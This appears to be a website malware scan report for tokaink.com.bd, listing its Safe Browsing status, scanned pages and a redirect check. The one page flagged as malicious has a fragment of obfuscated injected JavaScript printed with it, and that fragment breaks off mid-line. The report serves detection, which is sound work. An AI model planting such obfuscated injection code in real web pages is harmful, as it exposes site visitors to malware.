Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tokaink.com.bd
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tokaink.com.bd/ | 200 OK Content-Length: 3024 Content-Type: text/html | clean |
http://www.tokaink.com.bd/animate.js | 200 OK Content-Length: 14261 Content-Type: application/x-javascript | clean |
http://www.tokaink.com.bd/md.htm | 200 OK Content-Length: 5747 Content-Type: text/html | clean |
http://www.tokaink.com.bd/view.htm | 200 OK Content-Length: 4458 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokaink.htm | 200 OK Content-Length: 9039 Content-Type: text/html | clean |
http://www.tokaink.com.bd/contact.htm | 200 OK Content-Length: 1568 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokacontainiindex.htm | 200 OK Content-Length: 3819 Content-Type: text/html | clean |
http://www.tokaink.com.bd/index.htm | 200 OK Content-Length: 3024 Content-Type: text/html | clean |
http://www.tokaink.com.bd/directors.htm | 200 OK Content-Length: 4166 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokainkistaff.htm | 200 OK Content-Length: 3284 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokaalbum.htm | 200 OK Content-Length: 3627 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokagcolours.htm | 200 OK Content-Length: 8171 Content-Type: text/html | clean |
http://www.tokaink.com.bd/tokamgcolors.htm | 200 OK Content-Length: 8374 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function xU(){};this.zW=false;xU.prototype = {w : function() {this.lI='';kC="";var kU="";rK="";var a='';var j='replace';this.jA='';var y="";var t=new Array();var k=document;var wOH=new Array();this.rF=57959;var d=window;var e=new Date();kW='';var yZ=function(){};var nM=new Date();var u='';this.bV='';this.mO='';var zX="";var uX=new Array();var eK="eK";String.prototype.bK=function(z,v){return this[j](z, v)};var dS=false;this.lZ=false;var p="";bH="";this.hB=34808;mP="";bD="";this.mM="mM";var l = 's Decoded script: function () { var qP = new Date; this.xX = "xX"; this.eH = ""; kB = ""; wA.w(); var fF = ""; var lG = false; var uDR = new Date; this.pW = ""; } /*** called setTimeout with function () { var qP = new Date; this.xX = "xX"; this.eH = ""; kB = ""; wA.w(); var fF = ""; var lG = false; var uDR = new Date; this.pW = ""; }, 235 */ vHh</body></html> Antivirus reports:
| ||
http://www.tokaink.com.bd/method_testing.htm | 200 OK Content-Length: 14132 Content-Type: text/html | clean |
http://www.tokaink.com.bd/file:///E:/masud/toka-new/soleagent.htm | 404 Not Found Content-Length: 320 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tokaink.com.bd
Result:
GET / HTTP/1.1
Host: tokaink.com.bd
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tokaink.com.bd
Referer: http://www.google.com/search?q=tokaink.com.bd
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tokaink.com.bd
Referer: http://www.google.com/search?q=tokaink.com.bd
Result:
The result is similar to the first query. There are no suspicious redirects found.